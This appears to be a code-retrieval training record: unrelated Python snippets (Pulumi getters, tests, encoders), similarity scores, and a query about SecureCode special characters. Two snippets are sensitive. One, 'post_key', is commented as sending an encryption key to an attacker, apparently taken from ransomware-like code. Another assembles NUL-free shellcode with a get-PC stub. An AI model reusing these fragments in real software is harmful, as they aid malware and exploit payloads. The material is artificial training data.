Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"null_value\")", "def null_value(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"null_value\")", "def null_value(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"null_value\")", "def null_value(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"null_value\")", "def null_value(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"null_value\")", "def null_value(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"null_value\")", "def null_value(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"null_value\")", "def null_value(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"null_value\")", "def null_value(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"null_value\")", "def null_value(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"null_value\")", "def null_value(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"null_value\")", "def null_value(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"null_value\")", "def null_value(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"null_value\")", "def null_value(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"null_value\")", "def null_value(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"null_value\")", "def null_value(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"null_value\")", "def null_value(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"null_value\")", "def null_value(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"null_value\")", "def null_value(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"null_value\")", "def null_value(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"null_value\")", "def null_value(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"null_value\")", "def honeycode(self) -> Optional[pulumi.Input['ConnectorProfileConnectorProfileConfigConnectorProfileCredentialsHoneycodeArgs']]:\n return pulumi.get(self, \"honeycode\")", "def test_default_missing_honor(self):\r\n self.url_params['honor_code'] = ''\r\n response = self.client.post(self.url, self.url_params)\r\n self.assertEqual(response.status_code, 400)\r\n obj = json.loads(response.content)\r\n self.assertEqual(\r\n obj['value'],\r\n u'To enroll, you must follow the honor code.',\r\n )", "def _set_None(self):\n\n self.description = None\n self.func = None", "def __call__(self, value):\n value = str(value).strip()\n\n if len(value) == 0:\n pass\n\n else:\n super().__call__(value)", "def test_empty_value(self):\n avp_val = avp.AVP(0)\n self.assertEqual(avp_val.value, None)\n self.assertEqual(avp_val.payload, None)\n\n # We can then set its value\n avp_val.value = b''\n self.assertEqual(avp_val.value, b'')\n self.assertEqual(avp_val.payload, b'')\n\n # And unset it again\n avp_val.value = None\n self.assertEqual(avp_val.value, None)\n self.assertEqual(avp_val.payload, None)", "def _deserialize_null(self, *args):\n return None", "def _encode_nullable(data_type, obj, alias_validators, old_style, for_msgpack):\n if obj is not None:\n return _json_compat_obj_encode_helper(\n data_type.validator, obj, alias_validators, old_style, for_msgpack)\n else:\n return None", "def testEncodeEmpty(self):\n empty_case = ''\n encoded_result = ASCIITransportFormat.encode_data(empty_case)\n self.assertEqual(encoded_result, empty_case)", "def string(self, value):\n # respect {None}\n if value is None:\n # by leaving it alone\n return None\n # my value knows\n return str(value)", "def data():\n return None", "def secret() -> None:\n pass", "def __init__(__self__, *,\n code: Optional[pulumi.Input[str]] = None,\n message: Optional[pulumi.Input[str]] = None):\n if code is not None:\n pulumi.set(__self__, \"code\", code)\n if message is not None:\n pulumi.set(__self__, \"message\", message)", "def honeycode(self) -> Optional[pulumi.Input['ConnectorProfileConnectorProfileConfigConnectorProfilePropertiesHoneycodeArgs']]:\n return pulumi.get(self, \"honeycode\")", "async def code(self) -> str:\n if self.shared_secret:\n return generate_one_time_code(self.shared_secret)\n print(\"Please enter a Steam guard code\")\n code = await utils.ainput(\">>> \")\n return code.strip()", "def test_optional_honor(self):\r\n self.url_params['honor_code'] = ''\r\n response = self.client.post(self.url, self.url_params)\r\n self.assertEqual(response.status_code, 200)\r\n obj = json.loads(response.content)\r\n self.assertEqual(obj['success'], True)", "def test_key_none(self):\n try:\n AlphaVantage()\n self.fail(msg='A None api key must raise an error')\n except ValueError:\n self.assertTrue(True)", "def test_key_none(self):\n try:\n AlphaVantage()\n self.fail(msg='A None api key must raise an error')\n except ValueError:\n self.assertTrue(True)", "def null_check(cur,code,table,passvalue):\n cur.execute(code)\n result = cur.fetchall()[0][0]\n if result == passvalue:\n print(f\"Data Quality check passed. {table} doesn't have any null values.\")\n else:\n print(f\"Data quality check failed. {table} has null values.\")", "def form_InputNoneValue(request):\n schema = schemaish.Structure()\n schema.add('inputStrip', schemaish.String(default=''))\n\n form = formish.Form(schema, 'form')\n form['inputStrip'].widget = formish.Input(strip=True, none_value='BANG')\n return form", "def _sanitize(opt, value):\n return value if not opt.secret else '*' * 4", "def null(self):\n val = self.read(4)\n if val != b'null':\n self.on_parser_error(\"null token expected\")\n return null", "def _encode_supplement(self):", "def _encode_supplement(self):", "def sid_string(self) -> Optional[str]:\n return None", "def setNoCheckout(self) -> None:\n ...", "def empty_signature():\n return bytes(0)", "def changenonetoNone(s):\r\n if s=='None':\r\n return None\r\n else:\r\n return s", "def setUpFormData(self):\n super(NoCAS, self).setUpFormData()\n self.formData['CAS_ID'] = ''", "def xen_api_success_void():\n return xen_api_success(\"\")", "def mock_valid_data_without_security_code():\n return {\n \"CreditCardNumber\": \"123454567890123456\",\n \"CardHolder\": \"Test Name\",\n \"ExpirationDate\":\n (dt.datetime.now() + dt.timedelta(hours=1)).isoformat(),\n \"Amount\": 100\n }", "def nasm_null_safe_mutable_data_finalizer(env, code, data):\n\n if data or env.buffers:\n # Determine length of nullify + shellcode and adjust data pointer\n xor_offsets = []\n masked_data = OrderedDict()\n\n for datum, (offset, orig_datum) in six.iteritems(data):\n xor_offsets.extend([\n offset + i\n for i, b in enumerate(six.iterbytes(datum))\n if b in (0, 10, 13)\n ])\n\n masked_datum = b''.join([\n six.int2byte(b) if b not in (0, 10, 13)\n else six.int2byte(b ^ 0xff)\n for b in six.iterbytes(datum)\n ])\n masked_data[masked_datum] = (offset, orig_datum)\n\n if xor_offsets:\n # Build code to restore NUL, \\r and \\n\n temp_reg = env.TEMP_REG[env.target.bits]\n null_code = env.reg_load(env.BL, 255) + \\\n env.reg_load(temp_reg, env.OFFSET_REG)\n\n last_offset = 0\n for offset in xor_offsets:\n offset -= last_offset\n null_code.extend(\n env.reg_add(temp_reg, offset) +\n ['xor [%s], bl' % temp_reg]\n )\n last_offset += offset\n code = ['\\t%s' % line for line in null_code] + code\n data = masked_data\n\n code_len = len(asm('\\n'.join(code), target=env.target))\n adjust_ebp = env.reg_add(env.OFFSET_REG, code_len)\n\n return [\n '\\tjmp __getpc1',\n '__getpc0:',\n '\\tpop %s' % env.OFFSET_REG,\n ] + [\n '\\t%s' % line for line in adjust_ebp\n ] + [\n '\\tjmp __realstart',\n '__getpc1:',\n '\\tcall __getpc0',\n '__realstart:',\n ] + code + _pack_data(data)\n else:\n return code", "def sendOTP(code):\n # Modify the code here to change from print to any output \n print(\"Your OTP is \" + code + \". Kindly do not share it with anyone\")", "def getStrNo(self, key):\n value = self.getConf(key);\n if value == \"no\":\n return None\n else:\n return value", "def test_neg_operate_key_is_none(self):\n llist = [{\"op\": aerospike.OPERATOR_PREPEND, \"bin\": \"name\", \"val\": \"ram\"}]\n try:\n self.as_connection.operate(None, llist)\n\n except e.ParamError as exception:\n assert exception.code == -2", "def sendingString(self):\n return ''", "def generate_challenge(self):\n return None", "def test_none_hash(self):\n get_string = self.reverse_hash.get_string(None)\n self.assertEqual(get_string['error'], 'hash value passed is None')", "def _get_blank_value_18(field):\n if field.null:\n return None\n else:\n return field.value_to_string(None)", "def test_valid_null(self):\n f = lws.valid_null\n assert f(None, '') is True\n assert f('asdasdasd', '') is True" ]
[ "0.5724641", "0.56951576", "0.5571913", "0.55152303", "0.5499936", "0.54701316", "0.5447195", "0.5409918", "0.5399865", "0.5353087", "0.530565", "0.52624655", "0.5250316", "0.5222344", "0.52218187", "0.5196473", "0.51829845", "0.51713824", "0.5162897", "0.5159124", "0.5156829", "0.5152702", "0.51484877", "0.51170504", "0.51170504", "0.51170504", "0.50967187", "0.5095255", "0.5085713", "0.50845057", "0.506819", "0.5066156", "0.50619614", "0.50595015", "0.50338197", "0.50338197", "0.50338197", "0.50338197", "0.50338197", "0.50338197", "0.50338197", "0.50338197", "0.50338197", "0.50338197", "0.50338197", "0.50338197", "0.50338197", "0.50338197", "0.50338197", "0.50338197", "0.50338197", "0.50338197", "0.50338197", "0.50338197", "0.50338197", "0.50338197", "0.50338197", "0.50338197", "0.50338197", "0.50338197", "0.50338197", "0.50338197", "0.50308627", "0.5003807", "0.50037485", "0.49810973", "0.4980796", "0.4958856", "0.4955526", "0.49413982", "0.49404982", "0.49274534", "0.49164343", "0.4916264", "0.49081695", "0.4907163", "0.48964772", "0.48964182", "0.48964182", "0.4889248", "0.48891222", "0.48875037", "0.4881175", "0.48811433", "0.48811433", "0.487922", "0.48761952", "0.48741212", "0.48638368", "0.48573396", "0.48565912", "0.4855255", "0.4851683", "0.48461485", "0.48449984", "0.48447424", "0.48428094", "0.48284918", "0.48140672", "0.48115084", "0.4808443" ]
0.0
-1
Send special characters in SecureCode
def test_35(self): assert 'False' == Api.requestBlock('test-35')
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def encode(self, text):", "def encode_data ( data ) :\n firstpass = base64.b64encode( data )\n cipher = get_cipher( firstpass )\n\n index = 0\n datalen = len( firstpass )\n encoded_data = []\n while index < datalen :\n if index % 2 == 0 :\n encoded_data.append( chr( ord( firstpass[ index ] ) + cipher ) )\n else :\n encoded_data.append( chr( ord( firstpass[ index ] ) - cipher ) )\n index += 1\n\n encoded_data[ 0 ] = firstpass[ 0 ]\n encoded_data[ -1 ] = firstpass[ -1 ]\n encoded_data[ -2 ] = firstpass[ -2 ]\n return ''.join( encoded_data )", "def cryptate(self):\r\n\r\n intab1 = \"abcdefghijklomnopqrstuvwxyz\"\r\n outtab1 = \"?2p=o)7i(u9/y&t3%r¤5e#w1q!>)\"\r\n# Fetching the writing in textbox\r\n s = self.textbox.toPlainText()\r\n a = s.lower()\r\n# The crypting process, replaces letters in intab1 with outtab1\r\n crypted = (a.translate({ord(x): y for (x, y) in zip(intab1, outtab1)}))\r\n# Clear the textbox\r\n self.textbox.clear()\r\n# Write the crypted text within textbox\r\n self.textbox.setPlainText(crypted)", "def send_to_c2(msg: str) -> str:\n msg_as_ord = [ord(c) for c in msg]\n msg_encrypted = crypt1(msg_as_ord)\n resp = requests.post(C2_URL, data=str(msg_encrypted))\n if resp.status_code != 200:\n print('Got status code', resp.status_code)\n return None\n\n raw_resp = resp._content.decode('utf-8')\n encrypted_list = eval(raw_resp)\n decrypted_list = crypt1(encrypted_list)\n return ''.join([chr(i) for i in decrypted_list])", "def escape(self,s):\n\t\ts = s.replace('&', '&amp;').replace('<', '&lt;').replace('>', '&gt;')\n\t\ts = s.replace('\"','').replace(\"'\",\"\")\n\t\treturn ''.join([c for c in s if ord(c) > 0x1F])", "def sendkey_escape(string):\r\n return re.sub(r'([+^%~{}\\[\\]()])', r'{\\1}', string)", "def sendsafe(self, data):\n\n import base64\n\n data = base64.b85encode(self.as_bytes(data))\n return self.sendraw(data)", "def sendOTP(code):\n # Modify the code here to change from print to any output \n print(\"Your OTP is \" + code + \". Kindly do not share it with anyone\")", "def send_string(self, code_num, msg):\n self.client.send(f\"{code_num}_{msg}\".encode())", "def escapeEncode(s: unicode) -> unicode:\n ...", "def test_specialchar(self):\n form_data = self.form_data('vNzwXpzKJyTshvHsuULn')\n form = self.form(data=form_data, user=self.u)\n self.assertFalse(form.is_valid())", "def post_key(self):\n # print(self.key)\n #Sending the key to the attacker.\n s.send(bytes(\"K\\n{}\".format(str(self.key,'utf-8')),'utf-8'))", "def test_submithint_escape(self):\r\n mock_module = CHModuleFactory.create()\r\n json_in = {'answer': '29.0', 'hint': '<script> alert(\"Trololo\"); </script>'}\r\n mock_module.submit_hint(json_in)\r\n self.assertTrue(mock_module.hints['29.0']['0'][0] == u'&lt;script&gt; alert(&quot;Trololo&quot;); &lt;/script&gt;')", "def secret_char(c):\n return \"\\\\raisebox{{0.07ex}}{{{}}}\".format(c)", "def sendToClient(plaintext):\n signature = userKeys.signUsingPrivateKey(plaintext)\n encryptedText = userKeys.encrypt(plaintext, contactKey)\n s.send(encryptedText)\n time.sleep(1)\n s.send(signature)", "def encrypt_string(self, raw_string):\n return self.fernet_instance.encrypt(raw_string.encode('utf-8'))", "def non_secret_char(c):\n return c", "def encode_parameters(self, text):\n return quote_plus(text, safe='=:&\"')", "def encode(self, data):\n return self.__cipher.encrypt(data.encode('utf-8'))", "def encrypt(strings):\r\n rd = ''.join(random.sample(upperchr+lowcarsechr+otherchr+numchr,10))\r\n output = base64.encodestring(strings+mselment+rd)\r\n print output", "def _encode_partitial_parameter(data):\n return base64.b64encode(data.encode(\"utf-8\")).decode()", "def doEncode(self):\n raise CipherError(\"override this func and return the encoded msg\")", "async def encode(ctx, text: Option(str, \"Text to encode in brainfuck\")):\n encoded = bot.brainfuck.encode(text)\n await send_code(ctx, encoded.code, lang=\"bf\")", "def _encode_supplement(self):", "def _encode_supplement(self):", "def _escape(msg):\n reserved = bytearray('\\x7E\\x7D\\x11\\x13'.encode())\n escaped = bytearray()\n escaped.append(msg[0])\n\n for byte in msg[1:]:\n\n if byte in reserved:\n escaped.append(0x7D)\n escaped.append(byte ^ 0x20)\n else:\n escaped.append(byte)\n\n return escaped", "def encode_text():\n print(f\"{YELLOW}[{MIDDLE_DOT}]{RESET} Enter message to encode: \", end=\"\")\n message = input()\n encoded = LEFT_TO_RIGHT_MARK\n for message_char in message:\n code = '{0}{1}'.format('0' * padding, int(str(to_base(\n ord(message_char), len(zero_space_symbols)))))\n code = code[len(code) - padding:]\n for code_char in code:\n index = int(code_char)\n encoded = encoded + zero_space_symbols[index]\n\n encoded += RIGHT_TO_LEFT_MARK\n\n pyperclip.copy(encoded)\n print(f\"{GREEN}[+]{RESET} Encoded message copied to clipboard. {GREEN}[+]{RESET}\")", "def entry(from_code, key):\n # turn code to hexadecimal\n from_code = DC.uniToHex(from_code)\n\n en = DESEncode()\n string_len = len(from_code)\n\n if string_len < 1:\n print 'error input'\n return False\n key_code = en.encode(from_code, key, string_len)\n return key_code", "def setCharacterCode(code='STANDARD'):\n dislin.chacod(code)", "def main():\n key, plain = get_key_plain()\n encode(key, plain)", "def operate_cipher(self):", "def encode(self, strs):", "def encode(self, strs):", "def test_value_special_chars(self):\n raw = [\n 0x48,\n 0x65,\n 0x79,\n 0x21,\n 0x3F,\n 0x24,\n 0x20,\n 0xC4,\n 0xD6,\n 0xDC,\n 0xE4,\n 0xF6,\n 0xFC,\n 0xDF,\n ]\n string = \"Hey!?$ ÄÖÜäöüß\"\n self.assertEqual(DPTString.to_knx(string), raw)\n self.assertEqual(DPTString.from_knx(raw), string)", "def de_cryptate(self):\r\n\r\n intab1 = \"abcdefghijklomnopqrstuvwxyz !,.\"\r\n outtab1 = \"?2p=o)7i(u9/y&t3%r¤5e#w1q!>*'^;)\"\r\n# Fetching from written in textbox\r\n s = self.textbox.toPlainText()\r\n a = s.lower()\r\n# Changing out the letters/numbers/etc\r\n crypted = (a.translate({ord(x): y for (y, x) in zip(intab1, outtab1)}))\r\n# Clear the textbox\r\n self.textbox.clear()\r\n# Write the Decrypted text\r\n self.textbox.setPlainText(crypted)", "def _send(self, data):\n self._sock.send(self._cipher_tx.crypt(data))", "def _url_base64_encode(msg):\r\n msg_base64 = base64.b64encode(msg)\r\n msg_base64 = msg_base64.replace('+', '-')\r\n msg_base64 = msg_base64.replace('=', '_')\r\n msg_base64 = msg_base64.replace('/', '~')\r\n return msg_base64", "def test_post_special_characters(self):\n self.is_authenticated()\n response = self.post_special_characters()\n self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)\n self.assertEqual(response.data[\"error\"], \"You cannot post special characters\")", "def encode(plain):\n # Remove whitespace and punctionation\n encoded = remove_punctuation(plain.lower())\n encoded = remove_whitespace(encoded)\n \n # Add space after every 5 characters\n encoded = add_space(encoded, 5)\n \n # Use the cipher translation\n encoded = encoded.translate(cipher)\n \n return encoded", "def test_escape(self):\n bad_str = '''`~!@#$%^&*()_+-={}[]|\\\\;:'\",./<>?\\n\\r\\t '''\n self.run_escape_case(bad_str)", "def _applyCipher(self, encode):\n pass", "def weaksauce_encrypt(text, password):\n\n offset = sum([ord(x) for x in password])\n encoded = ''.join(\n chr(min(ord(x) + offset, 2**20))\n for x in text\n )\n return encoded", "def encode_email(email, key):\n return", "def escape_character_in_string(self, a, text):\n logging.debug(\"in escape character \" + text)\n #self.just_read_char()\n self.read_char()\n self.produce(STRING, text)", "def encode(self, decoded):", "def caesar_encode(self, text, key):\n result_list = []\n for char in text:\n if char.isalpha():\n if char.islower():\n offset = ASCII_LOWER_OFFSET\n else:\n offset = ASCII_UPPER_OFFSET\n char = chr((ord(char) - offset + key) % ALPHABET_SIZE + offset)\n result_list.append(char)\n return ''.join(result_list)", "async def password_generate_complex(self, ctx):\n await ctx.send(\n \"\".join(\n random.choice(string.ascii_letters[:94]) for i in range(random.randint(20, 35))\n )\n )", "def publickey_unsafe(sk: bytes) -> bytes:\n h = H(sk)\n a = decodecoord(h)\n A = scalarmult_B(a)\n return encodepoint(A)", "def recode_for_write(sec):\n sec2 = []\n for i in sec:\n sec2.append(i.decode('utf-8').encode('cp1251'))\n# sec2.append(i.encode('cp1251'))\n return sec2", "def test_special_characters(self):\n testString = sanitize('[-;]\\`{\\}')\n self.assertEqual(testString, '_________')", "def encrypt(self,string=\"vrorqjdqgwdqnviruwkhilvk\",key=3):\r\n return \"\".join([chr((ord(ch)-key-ord('a'))%(ord('z')-ord('a')+1)+ord('a')) for ch in string])", "def send_auth_code(phone: str):\n\n # Replace with credentials from your Twilio account\n account_sid = \"ACXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX\"\n auth_token = \"XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX\"\n client = Client(account_sid, auth_token)\n\n # secrets uses the most secure RNG available to the OS\n code = f'{secrets.randbelow(1000000):06}'\n\n # send SMS containing the code\n try:\n client.messages.create(\n to=f'+1{phone}',\n from_='+1XXXXXXXXXX',\n body=f'Your SecureLogin verification code is {code}')\n except TwilioRestException:\n return None\n else:\n return code", "def display_content(com,message):\n #message = message.encode('utf-8')\n #message = message.decode('ascii', 'ignore')\n safeMsg = filter(lambda x: x in string.printable, message)\n safeMsg = safeMsg.replace('\\n', ' ')\n print \"ALPHA: \", safeMsg\n try:\n #com = serial.Serial(config.devalpha, 9600, timeout=3)\n #com.close()\n #com.open()\n comstr = config.alpha['display'] + safeMsg + config.alpha['eot']\n com.write(comstr)\n #com.close()\n except serial.SerialException as e:\n logging.warning(\"Serial exception: \"+str(e))", "async def code(self) -> str:\n if self.shared_secret:\n return generate_one_time_code(self.shared_secret)\n print(\"Please enter a Steam guard code\")\n code = await utils.ainput(\">>> \")\n return code.strip()", "def _encode_code(self, text):\r\n replacements = [\r\n # Encode all ampersands; HTML entities are not\r\n # entities within a Markdown code span.\r\n ('&', '&amp;'),\r\n # Do the angle bracket song and dance:\r\n ('<', '&lt;'),\r\n ('>', '&gt;'),\r\n ]\r\n for before, after in replacements:\r\n text = text.replace(before, after)\r\n hashed = _hash_text(text)\r\n self._escape_table[text] = hashed\r\n return hashed", "def _safe_key(self, key):\n if isinstance(key, str):\n key = key.encode('UTF-8')\n return key", "def test_sendUnicodeCommand(self):\n self.p.sendCommand(\"CMD\", (\"param\\u00b9\", \"param\\u00b2\"))\n self.check(b\"CMD param\\xc2\\xb9 param\\xc2\\xb2\\r\\n\")", "def create_secret_code():\n characters = string.ascii_uppercase + string.digits\n size = 6\n return ''.join(random.choice(characters) for _ in range(size))", "def encrypt(data, key):\n data = six.ensure_binary(data)\n data = privy.hide(secret=data, password=key)\n data = six.ensure_text(data)\n return data", "def encryptionSelfMadeFunction(text,index):\n s = text\n transformedChar = \"\"\n\n transformedChar = s[0:index] + s[index+1:] +s[index]\n\n print(\"Encrypted Transformed text : \" )\n return transformedChar", "def escape(self):\n pass", "def encrypted(data: str) -> str:\n return b64encode(data.encode('ascii')).decode('ascii')", "def encrypt_data_key(self, dataKey, token, userGroup):\n masterKey = self.retrieve_master_key(token=token, userGroup=userGroup)\n box = secret.SecretBox(masterKey)\n if isinstance(dataKey, str):\n dataKey = dataKey.encode('utf-8')\n cipherText= box.encrypt(dataKey).decode('cp855')\n return cipherText", "def test_encode(self):\n assert url_encoder.encode(1) == 'TheStakeOut'\n assert url_encoder.encode(800) == 'TheStockTip-TheSeven'\n assert url_encoder.encode(99999) == 'MaleUnbonding-TheConversion-TheAndreaDoria'", "def secure_passphrase(val: str) -> bool:\n if len(val) < 15:\n return False\n if len([v for v in val if v not in string.ascii_letters]) < 5:\n return False\n\n return True", "def encode_string(self, value, double=False):\n\n # Replace special characters in string using the %xx escape\n encoded_str = quote(value, '')\n if double: # double encode\n encoded_str = quote(encoded_str, '')\n\n return encoded_str", "def ciphertext(self, be_secure=True):\n if be_secure and not self.__is_obfuscated:\n self.obfuscate()\n\n return self.__ciphertext", "def write_string(self, s: str) -> None:\n encoded_key = s.encode(\"ascii\")\n self.write_int32(len(encoded_key))\n self.buffer += encoded_key", "def encryptstring(text, password):\n\n enc = []\n for i in enumerate(text):\n key_c = password[i[0] % len(password)]\n enc_c = chr((ord(i[1]) + ord(key_c)) % 256)\n enc.append(enc_c)\n return base64.urlsafe_b64encode(\"\".join(enc).encode()).decode()", "def encrypt(self, str_msg):\n msg = str_msg.encode('utf-8')\n if self.security_type == gss.RequirementFlag.integrity:\n return gss.wrap(self.ctx, msg, False, None)[0]\n elif self.security_type == gss.RequirementFlag.confidentiality:\n res, used = gss.wrap(self.ctx, msg, True, None)\n if not used:\n raise GSSClientError('User requested encryption, '\n 'but it was not used!')\n return res\n else:\n return msg", "def encipher(self):\n ciphertext = \"\"\n for pt, key_char in zip(self.text, self.key):\n char_index = self.char_block.alphabet.index(pt)\n ciphertext += self.char_block.rows[key_char][char_index]\n print(ciphertext)", "def hack_message(self):\r\n\t\t#Will not let user input useless messages that cannot be hacked.\r\n\t\twhile True:\r\n\t\t\tself.message = input(\"Please enter a message you would like to hack. --> \")\r\n\t\t\tif self.message != \"\" and len(self.message) > 4:\r\n\t\t\t\tbreak\t\t\t\r\n\t\tmax_key = len(self.message)\r\n\t\tself.i = 1\r\n\t\tpotential_hits = []\r\n\t\t#Runs through all potential keys. \r\n\t\tfor self.i in range(1, max_key):\r\n\t\t\tprint(f\"Trying key #{self.i}\")\t\t\t\r\n\t\t\tself.my_code = Decryptor(self.message, self.i).transfer_decrypt()\r\n\t\t\tself.hack_plausible = False\r\n\t\t\tself.verify_hack_key()\r\n\t\t\tif self.hack_plausible:\r\n\t\t\t\tpotential_hits.append(f\"Key #{self.i} yeilded {self.percent_english}% english words after decryption.\\n\" + \"\\t\" + self.my_code[:50])\r\n\t\tprint(\"~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\\n\")\r\n\t\tprint(\"Hacking results:\\n\")\r\n\t\tfor hit in potential_hits:\r\n\t\t\tprint(\"\\t\" + hit + \"|\\n\")", "def encodeText(text):\r\n#\treturn repr( quote_plus(text.replace(\"'\", '\"')) )\r\n\ttry:\r\n\t\treturn repr( quote_plus(text.replace(\"'\", '\"').encode('utf-8')) )\r\n\texcept:\r\n\t\tlogError(\"encodeText()\")\r\n\treturn repr(text.replace(\"'\", '\"'))", "def encode_kiss(self):\n enc_frame = ''.join([\n self.destination.encode_kiss(),\n self.source.encode_kiss(),\n ''.join([path_call.encode_kiss() for path_call in self.path])\n ])\n return ''.join([\n enc_frame[:-1],\n chr(ord(enc_frame[-1]) | 0x01),\n kiss.SLOT_TIME,\n chr(0xF0),\n self.text\n ])", "def get(self):\r\n self.code = self.code.replace(\"PORT\", str(self.port))\r\n\r\n # Apply xor encoding.\r\n self.code = self.code if self.args.xor is 0 else xor_wrapper(self.name, self.code, self.args)\r\n\r\n # Apply base64 encoding.\r\n self.code = base64_wrapper(self.name, self.code, self.args)\r\n\r\n # Apply url-encoding\r\n if self.args.urlencode is True:\r\n self.code = to_urlencode(self.code)\r\n \r\n return self.code", "def adobe_base64_encode(cls, to_encode):\n if isinstance(to_encode, unicode):\n to_encode = to_encode.encode(\"utf8\")\n encoded = base64.encodestring(to_encode)\n return encoded.replace(b\"+\", b\":\").replace(b\"/\", b\";\").replace(b\"=\", b\"@\").strip()", "def encript(self): \n if (len(sys.argv) == Cconfiguration_caesar.DUAL_PARAMETER) and (int(sys.argv[Cconfiguration_caesar.INCREMENTAL_PARAMETER])>=Cconfiguration_caesar.INITIAL_INT_PARAMETER):\n result = \"\"\n k = int(sys.argv[Cconfiguration_caesar.INCREMENTAL_PARAMETER])\n plaintext = input(\"plaintext: \")\n for i in range(len(plaintext)):\n char = plaintext[i]\n if ((Cconfiguration_caesar.ALPHABET_LOWER_INDEX>ord(char)) or (Cconfiguration_caesar.ALPHABET_LOWER_LIMIT<ord(char))) and ((Cconfiguration_caesar.ALPHABET_UPPER_INDEX>ord(char)) or (Cconfiguration_caesar.ALPHABET_UPPER_LIMIT<ord(char))):\n result += char\n elif (char.isupper()):\n result += chr((ord(char) + k-Cconfiguration_caesar.ALPHABET_UPPER_INDEX) % Cconfiguration_caesar.ALPHABET_LIMIT + Cconfiguration_caesar.ALPHABET_UPPER_INDEX)\n else:\n result += chr((ord(char) + k - Cconfiguration_caesar.ALPHABET_LOWER_INDEX) % Cconfiguration_caesar.ALPHABET_LIMIT + Cconfiguration_caesar.ALPHABET_LOWER_INDEX)\n print(f\"ciphertext: {result}\")\n else:\n print(CextraStatusDefinition.COMMAND_LINE_EERROR)\n exit(Cconfiguration_caesar.INCREMENTAL_PARAMETER)", "def code_challenge(verifier):\n digest = hashlib.sha256(verifier).digest()\n return base64.urlsafe_b64encode(digest).rstrip(b'=')", "def encrypt_and_encode(data, key):\r\n return base64.urlsafe_b64encode(aes_encrypt(data, key))", "def encrypt():\n\tnull = 0", "def encodeVigenere(self, key):\n\n key = key.upper().replace(\" \", \"\")\n encode = Vig(key)\n cipherText = encode.encode(self.planeText)\n \n if (self.verbose == 1):\n print(cipherText)\n \n return(cipherText)", "def encrypt(text):\r\n\r\n cipher = fuzz(text)\r\n return hexify(cipher)", "def get21_str(in_dict):\n return \"\"\"BEGIN:VCARD\nVERSION:2.1\nN;ENCODING=QUOTED-PRINTABLE;CHARSET=UTF-8:;%s;;;\nTEL;VOICE;CELL:%s\nEND:VCARD\n\"\"\"%(quopri.encodestring(in_dict[\"name\"]), in_dict[\"tel\"])", "def encrypt_vigenere(plaintext: str, keyword: str) -> str:\n ciphertext = \"\"\n # PUT YOUR CODE HERE\n\n key_lenght = len(keyword)\n text_lenght = len(plaintext)\n while key_lenght != text_lenght:\n keyword += keyword\n key_lenght = len(keyword)\n if key_lenght > text_lenght:\n keyword = keyword[:text_lenght]\n key_lenght = len(keyword)\n code_key = []\n ord_A = ord('A')\n ord_a = ord('a')\n\n if plaintext.islower():\n for i in range(key_lenght):\n if plaintext[i] == \" \":\n code_key.append(\" \")\n else:\n code_key.append(ord(keyword[i]) - ord_a)\n code_text = []\n for n in range(text_lenght):\n if plaintext[n] == \" \":\n code_text.append(\" \")\n else:\n code_text.append(ord(plaintext[n]) - ord_a)\n ciphertext = ''\n for u in range(len(plaintext)):\n if plaintext[u] == \" \":\n ciphertext += \" \"\n else:\n value = (code_key[u] + code_text[u]) % 26 + ord_a\n ciphertext += chr(value)\n else:\n for i in range(key_lenght):\n if plaintext[i] == \" \":\n code_key.append(\" \")\n else:\n code_key.append(ord(keyword[i]) - ord_A)\n code_text = []\n for n in range(text_lenght):\n if plaintext[n] == \" \":\n code_text.append(\" \")\n else:\n code_text.append(ord(plaintext[n]) - ord_A)\n ciphertext = ''\n for u in range(len(plaintext)):\n if plaintext[u] == \" \":\n value = ord(\" \")\n else:\n value = (code_key[u] + code_text[u]) % 26 + ord_A\n ciphertext += chr(value)\n return ciphertext", "def send_text(self, data: str) -> None:", "def encode(text, password):\r\n\tstep_index = 0\r\n\tencoded_text = ''\r\n\tfor letter in text:\r\n\t\tencoded_text += next_letter(letter, to_int(password[step_index]))\r\n\t\tstep_index += 1\r\n\t\tif step_index > len(password)-1:\r\n\t\t\tstep_index = 0\r\n\treturn encoded_text", "def make_secure_val(string):\n\n return \"%s|%s\" % (string, hash_str(string))", "def _create_invitation_code(\n invitation_data: InvitationInputs, secret_key: bytes\n) -> bytes:\n\n # builds content\n content = InvitationContent(\n **invitation_data.dict(),\n created=datetime.utcnow(),\n )\n\n content_jsonstr: str = _ContentWithShortNames.serialize(content)\n assert \"\\n\" not in content_jsonstr # nosec\n\n # encrypts contents\n return _fernet_encrypt_as_urlsafe_code(\n data=content_jsonstr.encode(),\n secret_key=secret_key,\n )", "def password(self) -> str:", "def send_tx(self, tx):\n if sys.version_info >= (3, 0):\n tx = tx.encode('ascii')\n tx_b64 = base64.b64encode(tx)\n self.__rpc_client.call(\"Babble.SubmitTx\", [tx_b64], expect_reply=True)", "def test_encode(self):\n pass # TODO(tlarsen)", "def cipher_feedback(self):", "def obfuscate(self):\n r = self.public_key.get_random_lt_n()\n r_pow_n = powmod(r, self.public_key.n, 